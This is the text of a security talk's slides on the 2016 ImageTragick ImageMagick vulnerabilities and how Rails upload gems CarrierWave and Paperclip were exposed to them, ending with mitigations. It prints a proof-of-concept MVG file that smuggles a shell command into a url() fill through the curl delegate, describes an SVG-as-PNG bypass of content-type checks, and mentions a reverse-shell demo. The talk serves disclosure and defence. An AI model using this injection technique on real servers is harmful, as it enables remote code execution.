ImageTragick and Rails Gordon Chan @devgordon 

What is ImageMagick? ImageMagick® is a so ware suite that allows you to create, edit, compose, or convert bitmap images. It can read and write images in a variety of formats (over 200) including PNG, JPEG, JPEG-2000, GIF, TIFF, DPX, EXR, WebP, Postscript, PDF, and SVG. https://www.imagemagick.org 

Image Manipulation Library PNG, JPG, GIF, SVG, PS, PDF, MPEG, MVG, and more 

Magic Bytes ImageMagick identifies file type by its first few bytes # I m a g e M a g i c k / M a g i c k C o r e / m a g i c . c { " J P E G " , 0 , M a g i c P a t t e r n ( " \ 3 7 7 \ 3 3 0 \ 3 7 7 " ) } , { " G I F " , 0 , M a g i c P a t t e r n ( " G I F 8 " ) } , { " P N G " , 0 , M a g i c P a t t e r n ( " \ 2 1 1 P N G \ r \ n \ 0 3 2 \ n " ) } , { " S V G " , 1 , M a g i c P a t t e r n ( " ? X M L " ) } , { " M V G " , 0 , M a g i c P a t t e r n ( " p u s h g r a p h i c - c o n t e x t " ) } , Ignores file extensions $ i d e n t i f y r o s e . f o o r o s e . f o o J P E G 7 0 x 4 6 7 0 x 4 6 + 0 + 0 8 - b i t s R G B 2 . 3 6 K B 0 . 0 0 0 u 0 : 0 0 . 0 0 0 

Coders and Delegates Coders support the reading and/or writing of an image format (e.g. JPEG) Delegates (external libraries) may be used to process files $ c o n v e r t - l i s t d e l e g a t e . . . b m p < = w d p " m v " % i " " % i . b m p " ; " J x r E n c A p p " - i " % i . b m p " - o " % o . j x r " ; m v " b l e n d e r = > " b l e n d e r " - b " % i " - F P N G - o " % o " " \ n " c o n v e r t " - c o n c a t e n a t e " % o * . p n g d o c = > " s o f f i c e " - - h e a d l e s s - - c o n v e r t - t o p d f - - o u t d i r ` d i r n a m e " % i " ` p d f < = > p s " g s " - q - d Q U I E T - d S A F E R - d B A T C H - d N O P A U S E - d N O P R O M P T - d M a x B i t m a p = m p e g = > " f f m p e g " - n o s t d i n - v - 1 - i " % i " - v f r a m e s % S - v c o d e c p a m - a n - f r a w h t t p s = > " c u r l " - s - k - L - o " % o " " h t t p s : % M " . . . 

Delegates use system() Commands are executed in the host environment " c u r l " - s - k - L - o " % o " " h t t p s : % M " Parameters are substituted for values (e.g. file names, URLs) " c u r l " - s - k - L - o " / v a r / t m p / m a g i c k - 9 5 5 5 8 " " h t t p s : / / a . c o m / i m g . j p g " 

Magick Vector Graphics (MVG) Describes 2D vector and mixed vector/raster graphics p u s h g r a p h i c - c o n t e x t v i e w b o x 0 0 6 2 4 3 6 9 a f f i n e 0 . 2 8 3 6 3 6 0 0 0 . 2 8 3 8 4 6 - 0 - 0 p u s h g r a p h i c - c o n t e x t p u s h g r a p h i c - c o n t e x t f i l l ' d a r k s l a t e b l u e ' s t r o k e ' b l u e ' s t r o k e - w i d t h 1 r e c t a n g l e 1 , 1 2 1 9 9 , 1 2 9 9 f i l l ' u r l ( h t t p s : / / e x a m p l e . c o m / i m g . j p g ) ' u r l ( ) will use the HTTPS delegate i.e c u r l " c u r l " - s - k - L - o " / v a r / t m p / m a g i c k 2 3 " " h t t p s : / / e x a m p l e . c o m / i m g . j p g " 

ImageTragick Public disclosure on May 3, 2016 Collection of security vulnerabilities Remote code execution (RCE) File reading/moving/deletion Server-side request forgery (SSRF) 

CVE-2016-3714 Insufficient character filtering leads to code execution # e x p l o i t . m v g p u s h g r a p h i c - c o n t e x t v i e w b o x 0 0 6 4 0 4 8 0 f i l l ' u r l ( h t t p s : / / e x a m p l e . c o m / i m g . j p g " ; e c h o h e l l o w o r l d " ) ' $ c o n v e r t e x p l o i t . m v g o u t . p n g h e l l o w o r l d HTTPS delegate " c u r l " - s - k - L - o " % o " " h t t p s : % M " # ' % M ' i s r e p l a c e d w i t h ' / / e x a m p l e . c o m / i m g . j p g " ; e c h o h e l l o w o r l d ' " c u r l " . . . " h t t p s : / / e x a m p l e . c o m / i m g . j p g " ; e c h o h e l l o w o r l d 

Attack Vector Attacker uploads an image containing code they choose Image is processed with ImageMagick => code is executed 

Ruby on Rails Ruby gems for file and image uploads - P a p e r c l i p and C a r r i e r W a v e Both depend on M i n i M a g i c k for processing images M i n i M a g i c k is a wrapper for ImageMagick 

File Extensions Mean Nothing File name/extension and content-type whitelisting C a r r i e r W a v e believes what you tell it — no file inspection Remember — ImageMagick uses 'magic bytes' to identify file types, not file extensions ∴ C a r r i e r W a v e is vulnerable 

Paperclip is Vulnerable P a p e r c l i p inspects files to check its content-type $ f i l e - b - - m i m e i m a g e . p n g i m a g e / p n g ; c h a r s e t = b i n a r y But it only looks at the first part of the content-type (i m a g e ) So we can present an SVG as a PNG $ f i l e - b - - m i m e s v g . p n g i m a g e / s v g + x m l ; c h a r s e t = u s - a s c i i SVGs can reference external images (!) 

Demo - Rails Application Ruby 2.3.1 Rails 4.2.6 CarrierWave 0.11.2 Paperclip 4.3.6 MiniMagick 4.5.1 Debian 'jessie' ImageMagick 8:6.8.9.9-5+deb8u1 Docker - gordonchan/imagetragick-rails Rails and Docker defaults https://github.com/gchan/imagetragick-rails 

Code #1 c l a s s C a r r i e r W a v e I m a g e U p l o a d e r < C a r r i e r W a v e : : U p l o a d e r : : B a s e v e r s i o n : t h u m b { p r o c e s s r e s i z e _ t o _ f i l l : [ 2 0 0 , 2 0 0 ] } . . . d e f e x t e n s i o n _ w h i t e _ l i s t ; % w ( j p g j p e g g i f p n g ) ; e n d d e f c o n t e n t _ t y p e _ w h i t e l i s t ; [ / i m a g e \ / / ] ; e n d e n d 

Code #2 c l a s s I m a g e < A c t i v e R e c o r d : : B a s e m o u n t _ u p l o a d e r : c a r r i e r _ w a v e _ i m a g e , C a r r i e r W a v e I m a g e U p l o a d e r h a s _ a t t a c h e d _ f i l e : p a p e r c l i p _ i m a g e , s t y l e s : { t h u m b : " 1 0 0 x 1 0 0 # " } v a l i d a t e s _ a t t a c h m e n t _ c o n t e n t _ t y p e : p a p e r c l i p _ i m a g e , c o n t e n t _ t y p e : [ " i m a g e / j p e g " , " i m a g e / p n g " ] v a l i d a t e s _ a t t a c h m e n t _ f i l e _ n a m e : p a p e r c l i p _ i m a g e , m a t c h e s : [ / p n g \ Z / , / j p e ? g \ Z / ] 

Demo Time Remote code execution Remote access (reverse shell) 

Mitigation Patches available for Debian (May 16) Ubuntu patches coming soon? (as at May 26) Disable vulnerable coders (policy.xml) Test magic bytes of untrusted files Consider ImageMagick alternatives Sandbox image processing (seccomp, SELinux) General server security 

References and Sources https://www.imagetragick.com https://www.imagemagick.org https://blog.cloudflare.com/inside-imagetragick-the-real- payloads-being-used-to-hack-websites-2/ https://github.com/ImageTragick/PoCs https://github.com/thoughtbot/paperclip https://github.com/carrierwaveuploader/carrierwave https://github.com/ImageMagick/ImageMagick 

Gordon Chan @devgordon blog.devgordon.com github.com/gchan